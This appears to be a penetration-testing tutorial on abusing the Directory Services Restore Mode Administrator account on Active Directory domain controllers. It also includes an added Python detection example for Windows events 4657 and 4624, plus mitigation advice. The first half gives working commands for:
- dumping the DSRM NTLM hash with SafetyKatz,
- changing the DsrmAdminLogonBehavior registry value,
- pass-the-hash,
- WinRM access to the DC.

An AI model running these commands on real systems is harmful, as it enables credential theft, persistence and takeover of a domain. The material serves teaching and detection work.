DSRM
Every Domain Controller (DC) contains a built-in local Administrator account used for Directory Services Restore Mode (DSRM). This account is created during DC promotion and protected with a password (SafeModePassword) that is often never rotated after deployment, which makes it a valuable and persistent credential target.

Although this Administrator account is local to the DC and not part of AD, if the DC is misconfigured, the DSRM account can be abused for Pass-the-Hash (PtH) attacks. With Domain Admin (DA) privileges, its NTLM hash can be extracted using tools like SafetyKatz:
# Extract the DSRM password hash (requires DA privileges)
SafetyKatz.exe "token::elevate" "lsadump::sam" "exit"
To confirm it belongs to the DSRM account and not the DA, compare it with the output of:
# Extract the DA password hash
SafetyKatz.exe "lsadump::lsa /patch" "exit"
By default, the DSRM Administrator cannot log in while the system is running in normal (non-DSRM) mode. To enable login using the DSRM account, the registry key on the DC must be modified:
# Allow DSRM account login in normal mode
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "DsrmAdminLogonBehavior" /t REG_DWORD /d 2 /f
Once enabled, a PtH attack can be performed using the DSRM account's hash. Note that the domain must be set to the DC's hostname, not the AD domain (as it would be for an Overpass-the-Hash attack):
# PtH with DSRM credentials
SafetyKatz.exe "sekurlsa::pth /domain:dcorp-dc /user:administrator /ntlm:<ntlm> /run:powershell.exe" "exit"
To access the DC via WinRM (e.g., using PowerShell remoting), ensure the host is trusted and reachable:
# Add the DC as a trusted host (required when authenticating with NTLM rather than Kerberos via WinRM, e.g. by IP address)
Set-Item WSMan:\localhost\Client\TrustedHosts 172.16.2.1
# Access the DC via WinRM using the NT hash
Enter-PSSession -cn 172.16.2.1 -Authentication NegotiateWithImplicitCredential
This technique allows lateral movement directly into the Domain Controller using a long-lived, often-overlooked local account. It depends on two conditions: the DsrmAdminLogonBehavior misconfiguration, and the attacker already holding DA rights for the hash extraction and the registry change.
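Both steps of the technique leave traces on the DC: the registry change (event 4657, when a SACL is set on the Lsa key) and a logon whose target domain is the DC's own hostname instead of the AD domain (event 4624). The detection logic below is an added example, not code from the original page; the event records, the DC inventory and the account and host names are constructed, and the field names follow the 4657 and 4624 event schemas.

```python
# Added example (not the page's code): flag the two observable steps of DSRM
# abuse in Windows Security events. Event records, DC inventory and names are
# constructed; real 4657 events require a registry SACL on the Lsa key.

DC_HOSTS = {"DCORP-DC"}  # assumed inventory of domain controllers (uppercase)

SAMPLE_EVENTS = [  # constructed records using the 4657 / 4624 field names
    {"EventID": 4657, "Computer": "DCORP-DC", "SubjectUserName": "admin1",
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa",
     "ObjectValueName": "DsrmAdminLogonBehavior", "NewValue": "2"},
    {"EventID": 4624, "Computer": "DCORP-DC", "TargetUserName": "Administrator",
     "TargetDomainName": "DCORP-DC", "LogonType": "3", "IpAddress": "172.16.2.5"},
    {"EventID": 4624, "Computer": "DCORP-DC", "TargetUserName": "Administrator",
     "TargetDomainName": "CORP", "LogonType": "3", "IpAddress": "172.16.2.5"},
    {"EventID": 4657, "Computer": "DCORP-DC", "SubjectUserName": "admin1",
     "ObjectName": r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa",
     "ObjectValueName": "LmCompatibilityLevel", "NewValue": "5"},
]

def is_dsrm_logon_enabled(event):
    """4657 on a DC that sets DsrmAdminLogonBehavior to 1 or 2, i.e. the DSRM
    Administrator is allowed to log on outside Directory Services Restore Mode."""
    return (event.get("EventID") == 4657
            and event.get("Computer", "").upper() in DC_HOSTS
            and event.get("ObjectName", "").upper().endswith(r"\CONTROL\LSA")
            and event.get("ObjectValueName", "").lower() == "dsrmadminlogonbehavior"
            and event.get("NewValue") in {"1", "2"})

def is_local_account_logon_on_dc(event):
    """4624 on a DC whose target domain is the DC's own hostname: a local SAM
    account (on a DC, effectively the DSRM Administrator) authenticated over
    the network instead of a domain account."""
    if event.get("EventID") != 4624:
        return False
    host = event.get("Computer", "").upper()
    return (host in DC_HOSTS
            and event.get("TargetDomainName", "").upper() == host
            and event.get("LogonType") in {"3", "10"})  # network or RDP logon

def find_dsrm_abuse(events):
    """Return (rule_name, event) pairs, in input order, for every matching event."""
    hits = []
    for ev in events:
        if is_dsrm_logon_enabled(ev):
            hits.append(("dsrm_logon_enabled", ev))
        elif is_local_account_logon_on_dc(ev):
            hits.append(("local_account_logon_on_dc", ev))
    return hits
```

Alongside the detection, rotating the DSRM password on each DC (ntdsutil's "set dsrm password") and ensuring DsrmAdminLogonBehavior is absent or 0 removes the long-lived credential the technique relies on.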